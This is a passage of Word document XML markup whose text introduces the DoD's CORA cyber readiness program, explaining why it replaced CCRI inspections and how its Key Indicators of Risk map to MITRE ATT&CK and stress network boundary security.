        <w:t>Figure 5-6. Relationship Between Assessment Findings and Organizational Risk Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D84D9" w14:textId="4DE99DAD" w:rsidR="00F46DD2" w:rsidRPr="00F46DD2" w:rsidRDefault="00F46DD2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure 5-7. Identity-Centric Assessment Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E093E42" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A62459" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3D7DA447">
          <v:rect id="_x0000_i1059" style="width:468pt;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD30EB" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INCLUDED TABLES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DA5EE4" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A0E3661" w14:textId="64D26C14" w:rsidR="00B47558" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BODY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C762030" w14:textId="28B9BA45" w:rsidR="005D3438" w:rsidRPr="005D3438" w:rsidRDefault="005D3438" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Introduction to the United States Cyber Operational Readiness Assessment (CORA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658D69D8" w14:textId="50976C8F" w:rsidR="002F07A2" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Department of Defense (DoD) officially launched the United States Cyber Operational Readiness Assessment (CORA) program to replace the CCRIs on March 1, 2024. This launch followed a successful nine-month pilot program conducted by the Joint Force Headquarters-Department of Defense Information Network (JFHQ-DoDIN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A46C8C" w14:textId="5E555D16" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The DoD completely re-engineered the process and shifted away from the decade-old CCRI model for several critical and operational reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155A205" w14:textId="2B74C488" w:rsidR="002F07A2" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Why The Shift Occurred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4819C" w14:textId="5A022C61" w:rsidR="002F07A2" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The Scale Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC67413" w14:textId="0BE0EFF5" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unscalability was one of the CCRI inspections programs biggest faults. The Department of Defense Information Network (DoDIN) encompasses a global footprint of more than 15,000 </w:t>
      </w:r>
      <w:r w:rsidR="001C16B0" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unclassified</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and classified networks, mainly hosted by the DoD NIPRNet and SIPRNet networks. Legacy CCRIs relied on manual, highly focused on-site visits that could only evaluate restricted localized subsets of infrastructure at a time, making it nearly impossible to be able to effectively monitor the entire network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D1DA3" w14:textId="2B65DC70" w:rsidR="002F07A2" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Eliminating the “Inspection Surge” Culture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA748DC" w14:textId="4F62511C" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Under CCRI, federal and military commands often treated cybersecurity as a “</w:t>
      </w:r>
      <w:r w:rsidR="001C16B0" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>point</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-in-time” event. Teams would experience high-stress “surges” to patch systems, harden the network by applying security controls at the last minute without any ST&amp;E being conducted on how controls could negatively impact network operations at large, and would do this prior to the commencement of an inspection, to pass the “compliance checklist,” and then slip back into “standard” practices until the next audit. CORA replaces this with continuous operational readiness, demanding that federal and military networks </w:t>
      </w:r>
      <w:r w:rsidR="001C16B0" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>always remain defended</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF7EE54" w14:textId="02ABA360" w:rsidR="002F07A2" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Real-World Threat Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5612F85E" w14:textId="5935ED7C" w:rsidR="002F07A2" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The checklist compliance mindset of CCRI did not accurately reflect modern warfare and offensive or attacker tradecraft. CORA fuses active threat intelligence with the MITRE ATT&amp;CK Framework to explicitly target the real-world tactics, techniques, and procedures (TTPs) that adversaries are actively using against DoD networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F83633" w14:textId="3055741D" w:rsidR="002F07A2" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Prioritizing Command and Combatant “Mission Assurance” Over Scorecards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119CA868" w14:textId="633BD832" w:rsidR="002F07A2" w:rsidRPr="005D3438" w:rsidRDefault="002F07A2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Passing a CCRI mean</w:t>
      </w:r>
      <w:r w:rsidR="001C16B0" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> achieving a score above 70% on a rigid checklist and to be considered eligible for continuous ATO; however, a network cold technically pass while still holding critical, high-risk </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">vulnerabilities. CORA focuses entirely on </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Indicators of Risk (KIORs)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and boundary security, ,providing Commanders with actual data on how vulnerable their infrastructure is to a devastating cyberattack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44724A1B" w14:textId="77777777" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To successfully navigate a JFHQ-DoDIN Cyber Operational Readiness Assessment (CORA), Commands and Combatants must master two deeply intertwined components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC6B08E" w14:textId="4AE2E79E" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Key Indicators of Risk (KIORs)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Automated STIG Patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328064E6" w14:textId="09CE877A" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Because CORA tracks the active exploitability of an environment rather than just static checklist compliance, these two areas dictate whether a network is deemed mission ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152849B1" w14:textId="093E34E8" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Key Indicators of Risk (KIORs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40093A4C" w14:textId="04C15DF5" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KIORs are risk-based metrics developed by the JFHQ-DoDIN to identify vulnerabilities that present an immediate, existential threat to a Command’s network, or are deemed a grave cybersecurity consequence that threatens the Nation’s well-being and security. Rather than treating all findings equally, KIORs categorize threats based on real-world adversarial behaviors, activities, trends, and patterns via TTPs and the MITRE ATT&amp;CK Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9143BA" w14:textId="77777777" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA04BA" w14:textId="2C8E26C8" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KIORs are explicitly mapped to the MITRE ATT&amp;CK Framework. They track flaws that allow initial access, privilege escalation, lateral movement, or data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37E416" w14:textId="77777777" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Dynamic Adjustments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8787E8" w14:textId="1026FEB8" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The JFHQ-DoDIN continuously alters KIORs criteria in lockstep with shifting threat intelligence. If an adversary or nation-state ADP group alters their tactics, techniques, and procedures (TTPs), the corresponding network patch or configuration instantly becomes a heavily weighted KIOR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C10E4D3" w14:textId="77777777" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The Perimeter / Boundary Focus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F70DE6" w14:textId="3C607ADC" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A massive portion of KIOR scoring targets the </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Boundary. </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This includes any public-facing assets, internet-exposed interfaces, or connections shared between different DoD Commands. A single, unpatched flaw on an external gateway, for example, can trigger a critical KIOR alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCC9CE" w14:textId="77259AAE" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
